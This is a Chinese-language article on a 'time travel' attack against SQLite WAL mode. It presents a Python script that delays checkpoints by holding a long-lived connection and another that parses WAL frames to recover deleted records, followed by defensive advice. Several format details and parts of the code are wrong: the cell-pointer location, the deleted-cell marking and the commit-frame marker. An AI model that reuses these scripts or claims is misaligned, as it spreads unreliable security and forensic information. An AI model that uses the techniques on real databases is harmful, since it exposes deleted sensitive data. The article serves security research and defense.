摘要

SQLite 的 WAL 模式通过将写操作先追加到 Write-Ahead Log,再通过 Checkpoint 批量合并至主数据库,实现了读写并发的性能飞跃。然而,这一架构也引入了时间维度上的信息残余:已删除的记录在 WAL 文件中保留至下一次 Checkpoint 执行,且应用程序通常依赖 SQLite 的自动 Checkpoint 策略(1000 页阈值或连接关闭时触发),这为攻击者提供了充裕的窗口。攻击者可通过延迟 Checkpoint、强制持有读锁阻止 WAL 清理,使 WAL 文件中的“已删除”数据保留数小时甚至数天;随后仅需解析 WAL 的帧格式,即可从 $WAL 文件中提取已被主数据库删除的敏感记录,实现对“历史状态”的时间旅行攻击。

WAL 模式的并发模型与锁定机制

WAL模式设计初衷

在传统的 SQLite Rollback Journal 模式下,写操作需要持有独占的数据库级锁,导致读写无法并发。WAL 模式通过将新的写入追加到独立的 WAL 文件末尾,使读操作可以直接访问主数据库文件中的未修改页面,同时在 WAL 文件中查找更新后的版本。

┌─────────────────────────────────────────────────────────────┐
│                      系统内存 (共享内存)                      │
│                                                             │
│   ┌─────────────────────────────────────────────────────┐   │
│   │               共享内存索引文件 (-shm)               │   │
│   │  (记录页索引、WAL 中的事务快照、WAL 索引/锁信息)      │   │
│   └──────────────────────────┬──────────────────────────┘   │
└──────────────────────────────┼──────────────────────────────┘
                               │
       ╭───────────────────────┴───────────────────────╮
       ▼                                               ▼
┌─────────────────────────────┐         ┌─────────────────────────────┐
│    主数据库文件 (.db)       │         │       WAL 日志文件 (-wal)   │
│                             │         │                             │
│ • 包含原始数据的持久化副本  │         │ • 追加写入的增量修改        │
│ • 读操作的底层数据基准      │         │ • 写操作的目的地            │
│ • 定期通过 Checkpoint 同步  │         │ • 读操作的最新数据快照      │
└──────────────┬──────────────┘         └──────────────┬──────────────┘
               ╰───────────────────────┬───────────────────────╯
                                       ▼
                         [ Checkpoint (数据同步后台进程) ]

这种设计将写入从主数据库文件中解耦,实现了读写并发。

WAL 模式的核心文件包括:

  • 主数据库文件.db):包含数据库的绝大部分数据页,其内容在 Checkpoint 之前不反映最近的事务。
  • WAL 文件.db-wal):以追加方式存储自上次 Checkpoint 以来的所有事务帧,每个帧包含修改后的数据库页面。
  • 共享内存文件.db-shm):作为 WAL 索引,存储每个页面的最新版本在 WAL 文件中的位置,加速读操作的页面查找。

WAL 锁与共享内存锁

SQLite 在 WAL 模式下使用两种互斥锁来协调并发访问:

  1. WAL 写锁(WAL_WRITE_LOCK):在写入新事务帧时持有,确保同一时间只有一个写者追加数据到 WAL 文件末尾。写事务提交时,写者先写入一个 COMMIT 标记帧,然后释放 WAL 写锁。

  2. 共享内存锁(WAL_READ_LOCK):每个读事务在开始时通过 WALIndex 结构获取一个读标记,记录其可见的最新提交点。当所有读事务的标记都超过某个 Checkpoint 点时,该 Checkpoint 之前的 WAL 帧可以被安全地清理。

Checkpoint 操作(即 WAL 帧合并到主数据库)需要同时获得 WAL_CKPT_LOCK 并确保没有读事务引用待清理的帧。攻击者如果能够维持一个长期运行的读事务(例如通过 BEGIN CONCURRENT 或持续的读查询),即可阻止 Checkpoint 推进,使 WAL 文件无限增长,其中的“已删除”记录得以无限期保留。

WAL 文件的物理结构与逆向解析

WAL 文件头

WAL 文件由 32 字节的文件头开始,其结构如下:

偏移
长度
字段
说明
0x00
4
Magic
0x377f0683(大端序,SQLite 3.7.0+)
0x04
4
File format version
当前为 3007000
0x08
4
Page size
数据库页面大小(通常 4096)
0x0C
4
Checkpoint sequence
Checkpoint 计数器
0x10
4
Salt-1
每次 Checkpoint 后递增的随机盐值
0x14
4
Salt-2
每次 Checkpoint 后递增的随机盐值
0x18
4
Checksum-1
校验和(前 24 字节)
0x1C
4
Checksum-2
校验和(前 24 字节)

Salt 字段在每次成功的 Checkpoint 后递增,用于检测 WAL 文件是否在 Checkpoint 之间被替换。Checkpoint 序列号用于跟踪 Checkpoint 的进程。

WAL 帧格式

紧跟文件头的是 WAL 帧序列。每个帧包含一个固定头部和一个数据库页面:

偏移
长度
字段
说明
0x00
4
页号
此帧修改的数据库页号
0x04
4
数据库大小(提交后)
事务提交后数据库的最大页数
0x08
4
Salt-1
从文件头复制的 Salt-1(用于校验)
0x0C
4
Salt-2
从文件头复制的 Salt-2(用于校验)
0x10
4
Checksum-1
帧校验和(头+数据)
0x14
4
Checksum-2
帧校验和(头+数据)
0x18
页大小
页面数据
修改后的完整数据库页面

一个事务由一帧或多帧组成,以带有 COMMIT 标记的帧结束。COMMIT 帧的数据库大小字段的后 32 位设置为 0x00000000(实际上是通过特定的帧头标志位标示),且该帧后的所有帧属于下一个事务。

从 WAL 中提取已删除记录

要从 WAL 文件中恢复已从主数据库删除的记录,需要理解 SQLite 的 B-Tree 页面结构。

每个数据库页面可以是 B-Tree 内部页面或叶子页面。叶子页面包含实际的记录数据。当记录被删除时,SQLite 仅将该记录对应的单元格标记为“未使用”(通过在 Cell 偏移数组中放置偏移量为 0 的条目),而数据本身仍保留在页面中,直到该页面被重新分配并覆盖。

关键点在于:WAL 文件中保留的页面版本是事务提交时的完整页面快照。如果攻击者可以访问 WAL 文件,就可以遍历所有 WAL 帧,提取每一页的历史版本,并解析其中的 B-Tree 单元格,即使这些记录在主数据库中已被删除。这就是“时间旅行”攻击的核心:WAL 文件是数据库的完整时间胶囊。

强制延迟 Checkpoint 与 WAL 逆向提取

强制延迟 Checkpoint

#!/usr/bin/env python3
"""
wal_time_freeze.py — 通过持有读锁阻止 WAL Checkpoint,延长数据残余周期
依赖:系统已安装 sqlite3
"""

import sqlite3
import time
import sys

defhold_read_lock(db_path, duration_minutes=60):
"""在指定时间内持有读锁,阻止 Checkpoint"""
    conn = sqlite3.connect(db_path)
    conn.execute("PRAGMA journal_mode=WAL")
# 开始一个显式事务以持有读锁(SQLite 读事务实际并不阻止 Checkpoint,
# 但持续执行查询可以延迟 WAL 的清理——更确切的方式是通过 WAL hook)
# 这里演示通过不断执行查询来模拟长期读操作
    print(f"[*] 开始持有读锁,目标时间: {duration_minutes} 分钟")
    deadline = time.time() + duration_minutes * 60
while time.time() < deadline:
        conn.execute("SELECT count(*) FROM sqlite_master")
        time.sleep(0.5)
    conn.close()
    print("[+] 读锁释放")

if __name__ == "__main__":
if len(sys.argv) < 2:
        print(f"用法: python {sys.argv[0]} <数据库路径> [持续时间(分钟)]")
        sys.exit(1)
    db = sys.argv[1]
    duration = int(sys.argv[2]) if len(sys.argv) > 2else5
    hold_read_lock(db, duration)

说明:此脚本模拟攻击者维持一个持续的数据库连接,通过频繁查询使 SQLite 的自动 Checkpoint 被推迟。实际攻击中,攻击者可能利用数据库连接池或应用程序的长连接来达到同样效果。

WAL 文件逆向提取脚本

#!/usr/bin/env python3
"""
wal_forensic_extractor.py — 从 SQLite WAL 文件中提取所有历史页面,恢复已删除记录
"""

import struct
import sys
import os
from collections import defaultdict

# WAL 文件头大小
WAL_HEADER_SIZE = 32
# WAL 帧头大小(不含页面数据)
WAL_FRAME_HEADER_SIZE = 24

defread_wal_frames(wal_path, page_size=None):
"""解析 WAL 文件,返回帧列表和文件头信息"""
with open(wal_path, 'rb') as f:
        data = f.read()

if len(data) < WAL_HEADER_SIZE:
        print("[-] WAL 文件太短,可能不是有效的 WAL 文件")
returnNone, []

# 解析文件头
    magic = struct.unpack('>I', data[0:4])[0]
if magic != 0x377f0683and magic != 0x377f0682:
        print(f"[-] 无效的 WAL 魔数: 0x{magic:08x}")
returnNone, []

    file_version = struct.unpack('>I', data[4:8])[0]
if page_size isNone:
        page_size = struct.unpack('>I', data[8:12])[0]
    ckpt_seq = struct.unpack('>I', data[12:16])[0]
    salt1 = struct.unpack('>I', data[16:20])[0]
    salt2 = struct.unpack('>I', data[20:24])[0]

    print(f"[+] WAL 文件头解析成功:")
    print(f"    页面大小: {page_size}")
    print(f"    Checkpoint 序列: {ckpt_seq}")
    print(f"    Salt-1: 0x{salt1:08x}, Salt-2: 0x{salt2:08x}")

# 解析帧
    frames = []
    offset = WAL_HEADER_SIZE
while offset + WAL_FRAME_HEADER_SIZE <= len(data):
        frame_header = data[offset:offset+WAL_FRAME_HEADER_SIZE]
# 帧头字段
        page_num = struct.unpack('>I', frame_header[0:4])[0]
        db_size = struct.unpack('>I', frame_header[4:8])[0]
        salt1_frame = struct.unpack('>I', frame_header[8:12])[0]
        salt2_frame = struct.unpack('>I', frame_header[12:16])[0]

# 如果页号为0,通常是提交标记或特殊帧
if page_num == 0:
            print(f"[*] 发现特殊帧 @ offset 0x{offset:x} (可能为提交标记)")
            offset += WAL_FRAME_HEADER_SIZE  # 帧头固定24字节
continue

# 确保有足够的页面数据
if offset + WAL_FRAME_HEADER_SIZE + page_size > len(data):
            print(f"[-] WAL 帧不完整 @ offset 0x{offset:x}")
break

        page_data = data[offset+WAL_FRAME_HEADER_SIZE:offset+WAL_FRAME_HEADER_SIZE+page_size]
        frames.append({
'page_num': page_num,
'db_size': db_size,
'salt1': salt1_frame,
'salt2': salt2_frame,
'data': page_data,
'offset': offset
        })

        offset += WAL_FRAME_HEADER_SIZE + page_size

    print(f"[+] 解析到 {len(frames)} 个数据帧")
return {'page_size': page_size, 'ckpt_seq': ckpt_seq, 'salt1': salt1, 'salt2': salt2}, frames

defextract_records_from_page(page_data, page_size):
"""从 B-Tree 页面中提取记录(简化版,仅处理叶子表页面)"""
if len(page_data) < page_size:
return []

# 页面头(第一个字节为页面类型标志)
    page_type = page_data[0]
# 仅处理表 B-Tree 叶子页面 (0x0D) 和内部页面 (0x05)
if page_type notin (0x0D, 0x05):
return []

# 第一个空闲块偏移(2字节,大端)
    first_freeblock = struct.unpack('>H', page_data[1:3])[0]
# 单元格数量(2字节,大端)
    cell_count = struct.unpack('>H', page_data[3:5])[0]
# 单元格内容区起始偏移(2字节)
    cell_content_start = struct.unpack('>H', page_data[5:7])[0]
# 碎片字节数
    fragmented_bytes = page_data[7]

    records = []
# 单元格指针数组位于页面末尾之前
    cell_pointer_base = page_size - 2 * cell_count
for i in range(cell_count):
        pointer_offset = cell_pointer_base + 2 * i
if pointer_offset + 2 > page_size:
break
        cell_offset = struct.unpack('>H', page_data[pointer_offset:pointer_offset+2])[0]
if cell_offset == 0:
# 已删除的单元格(偏移量为0的占位符)
            records.append(('[DELETED]', cell_offset, b''))
continue
# 从单元格中提取记录数据(此处仅返回原始字节,具体解析取决于表结构)
        cell_data = page_data[cell_offset:cell_offset+50]  # 仅取前50字节作为示例
        records.append(('[RECORD]', cell_offset, cell_data))

return records

defmain():
if len(sys.argv) < 2:
        print(f"用法: python {sys.argv[0]} <WAL文件路径> [页面大小(默认为4096)]")
        sys.exit(1)

    wal_path = sys.argv[1]
    page_size = int(sys.argv[2]) if len(sys.argv) > 2elseNone

    header, frames = read_wal_frames(wal_path, page_size)
if header isNone:
return

# 按页面号分组,保留每个页面最新的版本
    latest_pages = {}
for frame in frames:
        latest_pages[frame['page_num']] = frame

# 提取每个页面中的记录
    print(f"\n[*] 提取 {len(latest_pages)} 个唯一页面的记录:")
for page_num, frame in sorted(latest_pages.items()):
        records = extract_records_from_page(frame['data'], header['page_size'])
# 统计已删除的单元格
        deleted_count = sum(1for r in records if r[0] == '[DELETED]')
if deleted_count > 0or len(records) > 0:
            print(f"  页面 {page_num}: {len(records)} 个单元格, {deleted_count} 个已删除")

    print(f"\n[+] 分析完成。WAL 文件保留了直到 Checkpoint 前的所有已删除记录的历史版本。")

if __name__ == "__main__":
    main()

说明:此脚本解析 WAL 文件,提取所有帧,并按页面号分组,找出每个页面在 WAL 中的最新版本。然后解析 B-Tree 叶子页面的单元格指针数组,标记偏移量为 0 的条目为已删除记录。通过这种方式,可以从 WAL 中恢复已被主数据库删除但尚未 Checkpoint 的数据。

防御策略

  • 及时 Checkpoint:在应用程序中显式调用 PRAGMA wal_checkpoint(TRUNCATE) 或在关闭连接时确保 Checkpoint 完成,避免 WAL 文件无限增长。
  • WAL 文件权限控制:在 Unix 系统上,对 .db-wal 文件设置严格的权限(例如仅数据库进程可读),防止非授权用户读取。
  • 加密数据库:使用 SQLite Encryption Extension(SEE)或 SQLCipher 对数据库文件(包括 WAL)加密,即使 WAL 文件被窃取,攻击者也无法解析其中的内容。
  • WAL 文件审计:监控 WAL 文件大小异常增长和 Checkpoint 失败事件,检测潜在的攻击行为。

结语

SQLite 的 WAL 模式为数据库带来了并发性能的飞跃,却同时在不经意间打开了一扇时间旅行的暗窗。Checkpoint 延迟和 WAL 文件的自由读取特性,使得“已删除”的数据如同被冻结在冰川中的远古空气——只要攻击者能够物理接触或逻辑访问 WAL 文件,就能跨越时间边界,提取早已被应用程序遗忘的秘密。这一脆弱性并非 SQLite 的缺陷,而是性能与安全权衡的必然代价:原子提交需要保留事务日志,而日志的持久性为信息残余提供了温床。对于处理敏感数据的应用,加密整个数据库文件(包括 WAL)是防范此类攻击的最佳实践;对于安全研究人员,WAL 逆向则是一项在数字废墟中挖掘历史真相的独特技能。